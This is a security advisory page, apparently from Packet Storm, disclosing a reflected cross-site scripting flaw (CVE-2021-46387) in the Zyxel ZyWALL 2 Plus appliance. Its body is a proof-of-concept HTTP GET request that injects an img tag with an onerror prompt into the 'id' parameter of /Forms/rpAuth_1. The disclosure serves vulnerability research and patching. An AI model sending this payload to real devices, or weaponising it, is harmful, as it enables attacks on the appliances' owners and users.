Home[1] Files[2] News[3] Contact[4] Add New[5]
- Zyxel ZyWALL 2 Plus Cross Site Scripting[6]
- Authored by Momen Eldawakhly[7]
-
Zyxel ZyWALL 2 Plus suffers from a cross site scripting vulnerability.
- advisories | CVE-2021-46387[8]
- MD5 |
fd4b0dad3ba6f24a0a04bfd6719dc3ee - Download[9] | Favorite[10] | View[11]
Change Mirror[12] Download[13]
# Exploit Title: Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting (XSS)
# Date: 1/3/2022
# Exploit Author: Momen Eldawakhly (CyberGuy)
# Vendor Homepage: https://www.zyxel.com
# Version: ZyWALL 2 Plus
# Tested on: Ubuntu Linux [Firefox]
# CVE : CVE-2021-46387
GET /Forms/rpAuth_1?id=%3C/form%3E%3CiMg%20src=x%20onerror=%22prompt(1)%22%3E%3Cform%3E HTTP/1.1
Host: vuln.ip:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Follow us on
Facebook
Subscribe to an RSS
FeedFile Tags
- ActiveX[19] (932)
- Advisory[20] (76,866)
- Arbitrary[21] (14,986)
- BBS[22] (2,859)
- Bypass[23] (1,532)
- CGI[24] (1,010)
- Code Execution[25] (6,544)
- Conference[26] (668)
- Cracker[27] (797)
- CSRF[28] (3,258)
- DoS[29] (21,603)
- Encryption[30] (2,323)
- Exploit[31] (49,328)
- File Inclusion[32] (4,128)
- File Upload[33] (934)
- Firewall[34] (821)
- Info Disclosure[35] (2,535)
- Intrusion Detection[36] (845)
- Java[37] (2,759)
- JavaScript[38] (791)
- Kernel[39] (5,934)
- Local[40] (13,932)
- Magazine[41] (586)
- Overflow[42] (12,059)
- Perl[43] (1,410)
- PHP[44] (5,030)
- Proof of Concept[45] (2,273)
- Protocol[46] (3,260)
- Python[47] (1,373)
- Remote[48] (29,442)
- Root[49] (3,435)
- Ruby[50] (574)
- Scanner[51] (1,629)
- Security Tool[52] (7,649)
- Shell[53] (3,023)
- Shellcode[54] (1,200)
- Sniffer[55] (878)
- Spoof[56] (2,069)
- SQL Injection[57] (15,921)
- TCP[58] (2,346)
- Trojan[59] (668)
- UDP[60] (866)
- Virus[61] (657)
- Vulnerability[62] (30,226)
- Web[63] (8,907)
- Whitepaper[64] (3,704)
- x86[65] (942)
- XSS[66] (17,242)
- Other[67]
File Archives
- March 2022[68]
- February 2022[69]
- January 2022[70]
- December 2021[71]
- November 2021[72]
- October 2021[73]
- September 2021[74]
- August 2021[75]
- July 2021[76]
- June 2021[77]
- May 2021[78]
- April 2021[79]
- Older[80]
Systems
- AIX[81] (423)
- Apple[82] (1,863)
- BSD[83] (368)
- CentOS[84] (55)
- Cisco[85] (1,911)
- Debian[86] (5,947)
- Fedora[87] (1,690)
- FreeBSD[88] (1,241)
- Gentoo[89] (4,152)
- HPUX[90] (875)
- iOS[91] (312)
- iPhone[92] (108)
- IRIX[93] (220)
- Juniper[94] (67)
- Linux[95] (41,577)
- Mac OS X[96] (682)
- Mandriva[97] (3,105)
- NetBSD[98] (255)
- OpenBSD[99] (477)
- RedHat[100] (11,129)
- Slackware[101] (941)
- Solaris[102] (1,604)
- SUSE[103] (1,444)
- Ubuntu[104] (7,643)
- UNIX[105] (9,030)
- UnixWare[106] (182)
- Windows[107] (6,298)
- Other[108]
© 2020 Packet Storm. All rights reserved.
- Services
- Security Services[119]
- Hosting By
- Rokasec[120]
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
